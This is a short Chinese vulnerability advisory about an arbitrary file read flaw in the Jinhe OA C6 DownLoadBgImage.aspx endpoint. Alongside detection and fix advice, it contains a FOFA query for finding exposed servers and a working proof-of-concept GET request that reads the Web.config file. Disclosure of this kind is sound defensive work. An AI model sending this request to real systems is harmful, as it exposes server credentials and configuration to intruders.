金和OA C6 DownLoadBgImage任意文件读取漏洞
漏洞描述
金和C6数据库是一款针对企业信息化管理而设计的高级数据库管理系统,主要应用于企业资源规划(ERP)、客户关系管理(CRM)以及办公自动化(OA)等领域。金和OA C6 接口JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx 其参数path存在文件遍历漏洞可读取系统任意文件,造成信息泄露。
威胁等级: 高危
漏洞分类: 信息泄露
涉及厂商及产品:金和C6
应用指纹及检出思路
此用存在二次开发的可能性,接口存在JHSoft 关键词可大致判断
fofa:body="JHSoft.Web.AddMenu" || app="金和网络-金和OA"
漏洞复现
GET /C6/JHSoft.Web.AddMenu/LoginTemplate/DownLoadBgImage.aspx/?path=/C6/Web.config HTTP/1.1 Host:
检测思路
检测web.config关键字段即可。如 等。
修复建议
设置访问控制策略,禁用此接口
